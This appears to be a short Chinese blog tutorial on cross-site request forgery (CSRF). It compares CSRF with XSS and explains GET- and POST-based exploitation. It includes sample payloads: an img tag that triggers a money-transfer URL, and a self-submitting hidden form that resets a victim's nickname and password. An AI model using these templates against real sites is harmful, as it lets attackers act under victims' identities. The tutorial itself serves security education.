CSRF

csrf

0x01 介绍

CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的。

CSRF与XSS
XSS:跨站脚本(Cross-site scripting)

CSRF:跨站请求伪造(Cross-site request forgery)

csrf 通过用户自己的手(用户的浏览器)在用户自己不知情的情况下 进行恶意的行为 执行挟持人的某些功能
xss 盗用用户的身份(cookie)完成js能完成的许多功能

总之

xss:用户过分信任网站,放任来自浏览器地址栏代表的那个网站代码在自己本地任意执行。如果没有浏览器的安全机制限制,xss代码可以在用户浏览器为所欲为;
csrf:网站过分信任用户,放任来自所谓通过访问控制机制的代表合法用户的请求执行网站的某个特定功能。

根据HTTP请求方式,CSRF利用方式可分为两种。

  • get
  • post

GET

1、用户首先登陆a网站
2、选人 输入转账金额 转账
3、发起请求

是否可控(url:http://a.ioio.pub:8080/users/pay?uid=92&monery=1000)
通过各种方式的跳转让受害者自己点击url
例如在一个页面中写入

<img src=http://wooyun.org/csrf.php?xx=11 />

标签

4、转账成功

产生原因

1、当前请求,是有意义的操作
2、当前请求,验证过于简单


POST

利用起来通常使用的是一个自动提交的表单,让用户打开如:

<form method='post' enctype="multipart/form-data",action='http://172.23.10.200/index.php/User/Index/RegisterUpdate/id/78'>
        <input type="hidden" value="xiaoduanSB" name="nikename">
    <input type="hidden" value="" name="password">
    <input type="hidden" value="" name="cpassword">
    <!-- 或者<input type='text' value='1981622273' name='u' style='display:none!important;display:block;width=0;height=0' /> -->

</form>

<script>
    document.forms[0].submit();

</script>

访问该页面后,表单会自动提交,相当于模拟用户完成了一次POST操作。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值